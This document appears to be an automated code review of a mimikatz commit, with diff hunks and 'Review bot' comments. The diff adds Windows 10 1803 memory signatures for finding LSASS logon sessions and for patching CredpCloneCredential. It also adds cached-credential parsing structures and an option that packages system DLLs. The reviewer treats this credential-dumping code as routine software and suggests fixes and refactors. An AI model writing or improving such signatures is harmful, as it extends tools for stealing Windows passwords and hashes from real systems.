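Review bot: The new `SamSrvReferences` row is keyed `KULL_M_WIN_BUILD_10_1709` with offset `{-21}`, while every other table touched by this commit gains a `KULL_M_WIN_BUILD_10_1803` row; if the lookup picks the highest build not above the running one this row also serves 1803 and a comment saying so (`// also covers 1803`) would stop the next reader from "fixing" the key, otherwise 1803 has no matching entry and the omission is a bug. In the header hunk, `szfullName` becomes `szFullName` but the neighbouring `szlogonScript`, `szprofilePath` and `szhomeDirectory` keep the lower-case style, so the rename settles the naming for only one field of the group; rename them together or leave a comment on why only this one changed.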
@@ -289,11 +289,30 @@ typedef struct _MSCACHE_ENTRY { BYTE enc_data[ANYSIZE_ARRAY]; } MSCACHE_ENTRY, *PMSCACHE_ENTRY; +typedef struct _MSCACHE_ENTRY_PTR { + UNICODE_STRING UserName; + UNICODE_STRING Domain; + UNICODE_STRING DnsDomainName; + UNICODE_STRING Upn; + UNICODE_STRING EffectiveName; + UNICODE_STRING FullName; + + UNICODE_STRING LogonScript; + UNICODE_STRING ProfilePath; + UNICODE_STRING HomeDirectory; + UNICODE_STRING HomeDirectoryDrive; + + PGROUP_MEMBERSHIP Groups; + + UNICODE_STRING LogonDomainName; + +} MSCACHE_ENTRY_PTR, *PMSCACHE_ENTRY_PTR; + typedef struct _MSCACHE_DATA { BYTE mshashdata[LM_NTLM_HASH_LENGTH]; BYTE unkhash[LM_NTLM_HASH_LENGTH]; DWORD unk0; - DWORD unk1; + DWORD szSC; DWORD unkLength; DWORD unk2; DWORD unk3; diff --git a/mimikatz/modules/kuhl_m_standard.c b/mimikatz/modules/kuhl_m_standard.c index 54a83f7..5910c25 100644 --- a/mimikatz/modules/kuhl_m_standard.c +++ b/mimikatz/modules/kuhl_m_standard.c @@ -90,7 +90,7 @@ NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[]) const wchar_t *version_libs[] = { L"lsasrv.dll", L"msv1_0.dll", L"tspkg.dll", L"wdigest.dll", L"kerberos.dll", L"livessp.dll", L"dpapisrv.dll", - L"kdcsvd.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll", + L"kdcsvc.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll", L"eventlog.dll", L"wevtsvc.dll", L"termsrv.dll", }; NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) @@ -99,6 +99,10 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) PVOID buffer; UINT lenVer; VS_FIXEDFILEINFO *verInfo; + PKIWI_CABINET pCab; + wchar_t *system, *cabname, pathc[MAX_PATH]; + DWORD dwSystem; + char *pFile, *acabname; BOOL isWow64 #ifdef _M_X64 = TRUE; 
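Review bot: `MSCACHE_ENTRY_PTR` is a set of `UNICODE_STRING`s and a `PGROUP_MEMBERSHIP` that, as `kuhl_m_lsadump_printMsCache` fills it, point into an `MSCACHE_ENTRY`'s `enc_data` rather than owning storage, and nothing in the header says so; a comment above the typedef such as `// Non-owning view: Buffer/Groups point into MSCACHE_ENTRY::enc_data and are valid only while that entry is.` would keep a future caller from freeing them. `szSC` replaces `unk1` in `MSCACHE_DATA` but carries no comment on what length it holds; recording it (presumably the size consumed by `kuhl_m_lsadump_decryptSCCache`, judging by the caller) preserves the result the commit derived. The blank line before `} MSCACHE_ENTRY_PTR` is stray.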
@@ -135,7 +139,7 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) } } #endif - if(argc) + if(kull_m_string_args_byName(argc, argv, L"full", NULL, NULL)) { kprintf(L"\n"); for(i = 0; i < ARRAYSIZE(version_libs); i++) @@ -157,6 +161,52 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) } } } + + if(kull_m_string_args_byName(argc, argv, L"cab", NULL, NULL)) + { + kprintf(L"\n"); + if(dwSystem = GetSystemDirectory(NULL, 0)) + { + if(system = (wchar_t *) LocalAlloc(LPTR, dwSystem * sizeof(wchar_t))) + { + if(GetSystemDirectory(system, dwSystem) == (dwSystem - 1)) + { + if(kull_m_string_sprintf(&cabname, MIMIKATZ L"_" MIMIKATZ_ARCH L"_sysfiles_%u", MIMIKATZ_NT_BUILD_NUMBER)) + { + if(acabname = kull_m_string_unicode_to_ansi(cabname)) + { + kprintf(L"CAB: %S\n", acabname); + if(pCab = kull_m_cabinet_create(acabname)) + { + for(i = 0; i < ARRAYSIZE(version_libs); i++) + { + if(PathCombine(pathc, system, version_libs[i])) + { + if(kull_m_file_isFileExist(pathc)) + { + if(pFile = kull_m_string_unicode_to_ansi(pathc)) + { + kprintf(L" -> %s\n", version_libs[i]); + kull_m_cabinet_add(pCab, pFile, NULL); + LocalFree(pFile); + } + } + } + else PRINT_ERROR_AUTO(L"PathCombine"); + } + kull_m_cabinet_close(pCab); + } + LocalFree(acabname); + } + LocalFree(cabname); + } + } + else PRINT_ERROR_AUTO(L"GetSystemDirectory(data)"); + LocalFree(system); + } + } + else PRINT_ERROR_AUTO(L"GetSystemDirectory(init)"); + } return STATUS_SUCCESS; } diff --git a/mimikatz/modules/kuhl_m_standard.h b/mimikatz/modules/kuhl_m_standard.h index a44507d..f9c2094 100644 --- a/mimikatz/modules/kuhl_m_standard.h +++ b/mimikatz/modules/kuhl_m_standard.h 
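Review bot: In the new `cab` branch the result of `kull_m_cabinet_add(pCab, pFile, NULL)` is discarded, so a file that fails to be added leaves an incomplete archive with no message; if the function reports failure (its prototype is not in the hunk), log it as the surrounding calls do, e.g. `if(!kull_m_cabinet_add(pCab, pFile, NULL)) PRINT_ERROR_AUTO(L"kull_m_cabinet_add");`, and likewise check `kull_m_cabinet_close(pCab)`, which is where a writer would flush. The branch nests nine `if` levels inside `kuhl_m_standard_version`; moving it into a `static` helper such as `kuhl_m_standard_version_cab(void)` would keep the option handling flat and let the release of `system`, `cabname` and `acabname` be read in one place. The function begins outside the hunk.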
@@ -5,10 +5,11 @@ */ #pragma once #include "kuhl_m.h" -#include "../modules/kull_m_string.h" -#include "../modules/kull_m_file.h" -#include "../modules/kull_m_process.h" -#include "../modules/kull_m_net.h" +#include "../../modules/kull_m_string.h" +#include "../../modules/kull_m_file.h" +#include "../../modules/kull_m_process.h" +#include "../../modules/kull_m_net.h" +#include "../../modules/kull_m_cabinet.h" const KUHL_M kuhl_m_standard; diff --git a/mimikatz/modules/kuhl_m_vault.c b/mimikatz/modules/kuhl_m_vault.c index 5d78e22..e42dc89 100644 --- a/mimikatz/modules/kuhl_m_vault.c +++ b/mimikatz/modules/kuhl_m_vault.c @@ -376,6 +376,7 @@ BYTE PTRN_WN62_CredpCloneCredential[] = {0x44, 0x8b, 0xfa, 0x41, 0x83, 0xe7, 0 BYTE PTRN_WN63_CredpCloneCredential[] = {0x45, 0x8b, 0xf8, 0x44, 0x23, 0xfa}; BYTE PTRN_WN10_1607_CredpCloneCredential[] = {0x45, 0x8b, 0xe0, 0x41, 0x83, 0xe4, 0x01, 0x75}; BYTE PTRN_WN10_1703_CredpCloneCredential[] = {0x45, 0x8b, 0xe6, 0x41, 0x83, 0xe4, 0x01, 0x75}; +BYTE PTRN_WN10_1803_CredpCloneCredential[] = {0x45, 0x8b, 0xfe, 0x41, 0x83, 0xe7, 0x01, 0x75}; BYTE PATC_WNT5_CredpCloneCredentialJmpShort[] = {0x90, 0xe9}; BYTE PATC_WALL_CredpCloneCredentialJmpShort[] = {0xeb}; BYTE PATC_WN64_CredpCloneCredentialJmpShort[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90}; 
@@ -387,6 +388,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
  {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
  {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_CredpCloneCredential), PTRN_WN10_1607_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
  {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN10_1703_CredpCloneCredential), PTRN_WN10_1703_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
+ {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN10_1803_CredpCloneCredential), PTRN_WN10_1803_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
index ab83d34..e9c5dc4 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -12,6 +12,7 @@ BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0
 BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05};
 BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
+BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
  {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
  {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@@ -21,6 +22,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
  {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}},
  {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
  {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
+ {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};